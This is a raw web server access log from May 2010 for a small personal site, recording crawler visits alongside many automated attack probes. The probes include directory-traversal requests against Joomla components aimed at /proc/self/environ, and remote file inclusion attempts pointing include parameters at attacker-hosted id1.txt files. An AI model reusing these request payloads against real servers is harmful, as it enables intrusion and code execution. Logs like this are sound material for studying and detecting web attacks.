72.18.155.234 - - [02/May/2010:14:04:48 -0500] "GET /index2.php?option=com_feederator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.812"
72.18.155.234 - - [02/May/2010:14:06:33 -0500] "GET /logs/index2.php?option=com_feederator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.812"
72.18.155.234 - - [02/May/2010:14:06:33 -0500] "GET /index2.php?option=com_feederator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.812"
67.195.112.180 - - [02/May/2010:14:12:47 -0500] "GET /logs/access_log.1271635200 HTTP/1.0" 200 643612 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
173.83.250.21 - - [02/May/2010:14:13:48 -0500] "GET /logs/access_log.1268956800//poll/poll_ssi.php?include_path=http://christenplein.com/id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
173.83.250.21 - - [02/May/2010:14:13:51 -0500] "GET /logs/access_log.1270684800//poll/poll_ssi.php?include_path=http://christenplein.com/id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
72.30.161.241 - - [02/May/2010:14:15:20 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.161.241 - - [02/May/2010:14:15:20 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [02/May/2010:14:18:17 -0500] "GET /logs/access_log.1271376000 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
72.18.155.234 - - [02/May/2010:14:18:38 -0500] "GET /logs/access_log.1270857600/index2.php?option=com_feederator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.812"
72.18.155.234 - - [02/May/2010:14:18:38 -0500] "GET /index2.php?option=com_feederator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.812"
72.18.155.234 - - [02/May/2010:14:18:38 -0500] "GET /logs/index2.php?option=com_feederator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.812"
78.110.50.139 - - [02/May/2010:14:20:21 -0500] "GET /logs/access_log.1270598400%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:14:20:21 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:14:20:22 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:14:20:24 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:14:20:24 -0500] "GET /logs/access_log.1270598400%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:14:20:24 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
207.46.13.143 - - [02/May/2010:14:21:55 -0500] "GET /logs/access_log.1242777600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.218.116.131 - - [02/May/2010:14:22:03 -0500] "GET /logs/access_log.1249430400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
78.26.187.208 - - [02/May/2010:14:23:49 -0500] "GET /logs/access_log.1261699200 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1261699200""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
207.46.204.180 - - [02/May/2010:14:27:25 -0500] "GET /logs/access_log.1245715200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.50 - - [02/May/2010:14:30:25 -0500] "GET /logs/access_log.1264291200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.39.130.176 - - [02/May/2010:14:31:10 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
211.39.130.176 - - [02/May/2010:14:31:11 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
189.108.172.26 - - [02/May/2010:14:32:14 -0500] "GET /logs/access_log.1233100800/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://e-regis.cmtc.ac.th/cvs/id1.txt? HTTP/1.1" 404 377 "-""Mozilla/5.0"
189.108.172.26 - - [02/May/2010:14:32:14 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://e-regis.cmtc.ac.th/cvs/id1.txt? HTTP/1.1" 404 355 "-""Mozilla/5.0"
189.108.172.26 - - [02/May/2010:14:32:14 -0500] "GET /logs/access_log.1229644800/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://e-regis.cmtc.ac.th/cvs/id1.txt? HTTP/1.1" 404 377 "-""Mozilla/5.0"
189.108.172.26 - - [02/May/2010:14:32:14 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://e-regis.cmtc.ac.th/cvs/id1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
62.24.129.13 - - [02/May/2010:14:34:51 -0500] "GET /tattoo/set1.htm HTTP/1.0" 200 2362 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
87.250.255.243 - - [02/May/2010:14:35:07 -0500] "GET /logs/access_log.1271116800 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [02/May/2010:14:39:15 -0500] "GET /logs/access_log.1232582400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
200.6.154.57 - - [02/May/2010:14:43:12 -0500] "GET /logs/access_log.1268611200/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.823"
200.6.154.57 - - [02/May/2010:14:43:12 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.823"
200.6.154.57 - - [02/May/2010:14:43:12 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.823"
207.46.204.235 - - [02/May/2010:14:44:25 -0500] "GET /logs/access_log.1202342400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.50 - - [02/May/2010:14:48:25 -0500] "GET /logs/access_log.1265414400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
78.110.50.139 - - [02/May/2010:14:49:20 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:14:49:20 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:14:49:20 -0500] "GET /logs/access_log.1265155200//modules/TotalCalendar/about.php?inc_dir=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:14:49:20 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:14:49:20 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:14:49:20 -0500] "GET /logs/access_log.1265155200//modules/TotalCalendar/about.php?inc_dir=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:14:49:54 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:14:49:54 -0500] "GET /logs/access_log.1265155200//modules/TotalCalendar/about.php?inc_dir=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:14:49:54 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:14:50:00 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:14:50:01 -0500] "GET /logs/access_log.1265155200//modules/TotalCalendar/about.php?inc_dir=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:14:50:01 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
87.250.255.243 - - [02/May/2010:14:50:02 -0500] "GET /artwork/playhouse.htm HTTP/1.1" 200 521 "-""Yandex/1.01.001 (compatible; Win16; I)"
78.110.50.139 - - [02/May/2010:14:50:04 -0500] "GET /logs/access_log.1264032000//modules/TotalCalendar/about.php?inc_dir=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:14:50:06 -0500] "GET /logs/access_log.1264032000//modules/TotalCalendar/about.php?inc_dir=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
75.136.121.230 - - [02/May/2010:14:50:25 -0500] "GET /logs/access_log.1265760000/?INCLUDE_FOLDER=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
75.136.121.230 - - [02/May/2010:14:50:25 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 200 3993 "-""Mozilla/5.0"
75.136.121.230 - - [02/May/2010:14:50:25 -0500] "GET /?INCLUDE_FOLDER=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
75.136.121.230 - - [02/May/2010:14:50:26 -0500] "GET /logs/access_log.1262822400/?INCLUDE_FOLDER=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:14:50:30 -0500] "GET /logs/access_log.1264032000//modules/TotalCalendar/about.php?inc_dir=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:14:50:37 -0500] "GET /logs/access_log.1264032000//modules/TotalCalendar/about.php?inc_dir=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
75.136.121.230 - - [02/May/2010:14:55:01 -0500] "GET /logs/access_log.1265760000/?INCLUDE_FOLDER=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
75.136.121.230 - - [02/May/2010:14:55:01 -0500] "GET /?INCLUDE_FOLDER=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
75.136.121.230 - - [02/May/2010:14:55:01 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 200 3993 "-""Mozilla/5.0"
75.136.121.230 - - [02/May/2010:14:55:38 -0500] "GET /logs/access_log.1262822400/?INCLUDE_FOLDER=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
75.136.121.230 - - [02/May/2010:15:01:23 -0500] "GET /?INCLUDE_FOLDER=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
75.136.121.230 - - [02/May/2010:15:01:23 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 200 3993 "-""Mozilla/5.0"
75.136.121.230 - - [02/May/2010:15:01:24 -0500] "GET /logs/access_log.1265760000/?INCLUDE_FOLDER=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
75.136.121.230 - - [02/May/2010:15:01:24 -0500] "GET /logs/access_log.1262822400/?INCLUDE_FOLDER=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
75.136.121.230 - - [02/May/2010:15:01:27 -0500] "GET /logs/access_log.1262822400/?INCLUDE_FOLDER=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
75.136.121.230 - - [02/May/2010:15:01:27 -0500] "GET /logs/access_log.1265760000/?INCLUDE_FOLDER=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
75.136.121.230 - - [02/May/2010:15:01:27 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 200 3993 "-""Mozilla/5.0"
75.136.121.230 - - [02/May/2010:15:01:29 -0500] "GET /?INCLUDE_FOLDER=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
74.201.117.226 - - [02/May/2010:15:05:38 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
87.250.255.243 - - [02/May/2010:15:06:49 -0500] "GET /logs/access_log.1271203200 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [02/May/2010:15:08:27 -0500] "GET /logs/access_log.1212969600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
65.163.88.107 - - [02/May/2010:15:15:33 -0500] "GET //errors.php?error=http://christenplein.com/id1.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
65.163.88.107 - - [02/May/2010:15:15:33 -0500] "GET /logs//errors.php?error=http://christenplein.com/id1.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
65.163.88.107 - - [02/May/2010:15:15:33 -0500] "GET /logs/access_log.1268611200%20%20//errors.php?error=http://christenplein.com/id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
207.46.13.49 - - [02/May/2010:15:18:55 -0500] "GET /artwork/carousel.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
75.136.121.230 - - [02/May/2010:15:19:33 -0500] "GET /logs/access_log.1268956800%20%20/?INCLUDE_FOLDER=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
75.136.121.230 - - [02/May/2010:15:21:37 -0500] "GET /logs/access_log.1268956800%20%20/?INCLUDE_FOLDER=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
65.163.88.107 - - [02/May/2010:15:22:39 -0500] "GET /logs/access_log.1268611200//errors.php?error=http://christenplein.com/id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
207.46.199.198 - - [02/May/2010:15:23:52 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [02/May/2010:15:25:42 -0500] "GET /logs/ HTTP/1.1" 200 3987 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [02/May/2010:15:26:51 -0500] "GET /logs/access_log.1189468800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
220.232.195.131 - - [02/May/2010:15:36:59 -0500] "GET /logs/index.php?option=com_linkr&controller=./../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
220.232.195.131 - - [02/May/2010:15:36:59 -0500] "GET /index.php?option=com_linkr&controller=./../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
220.232.195.131 - - [02/May/2010:15:37:00 -0500] "GET /logs/index.php?option=com_linkr&controller=./../../../../../../../proc/self/environ HTTP/1.1" 404 298 "-""-"
220.232.195.131 - - [02/May/2010:15:37:00 -0500] "GET /index.php?option=com_linkr&controller=./../../../../../../../proc/self/environ HTTP/1.1" 404 293 "-""-"
24.11.242.122 - - [02/May/2010:15:37:28 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.com/search?q=vintage+tattoo+flash&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.5.3 NET_mmhpset (.NET CLR 3.5.30729)"
24.11.242.122 - - [02/May/2010:15:37:28 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.5.3 NET_mmhpset (.NET CLR 3.5.30729)"
24.11.242.122 - - [02/May/2010:15:37:30 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.5.3 NET_mmhpset (.NET CLR 3.5.30729)"
24.11.242.122 - - [02/May/2010:15:37:32 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.5.3 NET_mmhpset (.NET CLR 3.5.30729)"
67.218.116.165 - - [02/May/2010:15:37:45 -0500] "GET /logs/access_log.1262563200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
75.136.121.230 - - [02/May/2010:15:39:33 -0500] "GET /logs/access_log.1268956800%20%20/?INCLUDE_FOLDER=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
87.250.255.243 - - [02/May/2010:15:40:55 -0500] "GET /logs/access_log.1237852800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
75.136.121.230 - - [02/May/2010:15:42:48 -0500] "GET /logs/access_log.1268956800%20%20/?INCLUDE_FOLDER=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
204.15.190.163 - - [02/May/2010:15:44:38 -0500] "GET /?sourcedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
204.15.190.163 - - [02/May/2010:15:44:38 -0500] "GET /logs/?sourcedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 3993 "-""Mozilla/5.0"
204.15.190.163 - - [02/May/2010:15:44:38 -0500] "GET /logs/access_log.1264550400/?sourcedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
204.15.190.163 - - [02/May/2010:15:44:54 -0500] "GET /logs/access_log.1263859200/?sourcedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
207.46.195.226 - - [02/May/2010:15:48:25 -0500] "GET /logs/access_log.1216425600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.241 - - [02/May/2010:15:49:25 -0500] "GET /logs/access_log.1194825600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
79.174.78.178 - - [02/May/2010:15:49:51 -0500] "GET /logs/index2.php?option=com_joomla_flash_uploader&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
79.174.78.178 - - [02/May/2010:15:49:52 -0500] "GET /index2.php?option=com_joomla_flash_uploader&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
208.115.111.248 - - [02/May/2010:15:52:15 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
207.46.13.50 - - [02/May/2010:15:54:25 -0500] "GET /logs/access_log.1163721600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [02/May/2010:15:56:33 -0500] "GET /logs/access_log.1272758400 HTTP/1.0" 200 368209 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.204.184 - - [02/May/2010:15:56:56 -0500] "GET /logs/access_log.1171238400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
212.26.227.88 - - [02/May/2010:15:57:38 -0500] "GET /logs///administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.zhivagobank.ru/userfiles/d1.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
212.26.227.88 - - [02/May/2010:15:57:39 -0500] "GET ///administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.zhivagobank.ru/userfiles/d1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
212.26.227.88 - - [02/May/2010:15:57:39 -0500] "GET /logs/access_log.1265673600///administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.zhivagobank.ru/userfiles/d1.txt??? HTTP/1.1" 404 366 "-""Mozilla/5.0"
212.26.227.88 - - [02/May/2010:15:57:39 -0500] "GET ///administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.zhivagobank.ru/userfiles/d1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
212.26.227.88 - - [02/May/2010:15:57:39 -0500] "GET /logs///administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.zhivagobank.ru/userfiles/d1.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
212.26.227.88 - - [02/May/2010:15:57:41 -0500] "GET /logs/access_log.1265673600///administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.zhivagobank.ru/userfiles/d1.txt??? HTTP/1.1" 404 366 "-""Mozilla/5.0"
207.46.13.45 - - [02/May/2010:15:59:25 -0500] "GET /logs/access_log.1208649600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
79.174.78.178 - - [02/May/2010:15:59:40 -0500] "GET /logs/index2.php?option=com_clickheat&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
79.174.78.178 - - [02/May/2010:15:59:41 -0500] "GET /index2.php?option=com_clickheat&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
79.174.78.178 - - [02/May/2010:15:59:54 -0500] "GET /logs/access_log.1268956800/index2.php?option=com_serverstat&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
79.174.78.178 - - [02/May/2010:15:59:55 -0500] "GET /index2.php?option=com_serverstat&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
79.174.78.178 - - [02/May/2010:15:59:55 -0500] "GET /logs/index2.php?option=com_serverstat&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.195.112.180 - - [02/May/2010:16:00:07 -0500] "GET /logs/access_log.1202601600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [02/May/2010:16:01:49 -0500] "GET /logs/access_log.1247702400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.142 - - [02/May/2010:16:01:55 -0500] "GET /logs/access_log.1200182400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.185 - - [02/May/2010:16:05:25 -0500] "GET /logs/access_log.1245456000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
79.174.78.178 - - [02/May/2010:16:09:08 -0500] "GET /logs/access_log.1270857600/index2.php?option=com_joomla_flash_uploader&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
79.174.78.178 - - [02/May/2010:16:09:08 -0500] "GET /index2.php?option=com_joomla_flash_uploader&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
79.174.78.178 - - [02/May/2010:16:09:08 -0500] "GET /logs/index2.php?option=com_joomla_flash_uploader&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.208.34.38 - - [02/May/2010:16:12:19 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://motes.homelinux.com/jonathan/ecommerce/libraries/product_photos/thums/zoz/id1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
81.208.34.38 - - [02/May/2010:16:12:19 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://motes.homelinux.com/jonathan/ecommerce/libraries/product_photos/thums/zoz/id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
81.208.34.38 - - [02/May/2010:16:12:19 -0500] "GET /logs/access_log.1268611200%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://motes.homelinux.com/jonathan/ecommerce/libraries/product_photos/thums/zoz/id1.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
79.174.78.178 - - [02/May/2010:16:19:21 -0500] "GET /logs/access_log.1237852800/index2.php?option=com_clickheat&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
79.174.78.178 - - [02/May/2010:16:19:21 -0500] "GET /index2.php?option=com_clickheat&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
79.174.78.178 - - [02/May/2010:16:19:22 -0500] "GET /logs/index2.php?option=com_clickheat&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.195.112.180 - - [02/May/2010:16:19:30 -0500] "GET /logs/access_log.1202688000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
81.208.34.38 - - [02/May/2010:16:19:42 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://zxz.dk//data/alfdoj/id1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
81.208.34.38 - - [02/May/2010:16:19:42 -0500] "GET /logs/access_log.1268611200%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://zxz.dk//data/alfdoj/id1.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
81.208.34.38 - - [02/May/2010:16:19:45 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://zxz.dk//data/alfdoj/id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
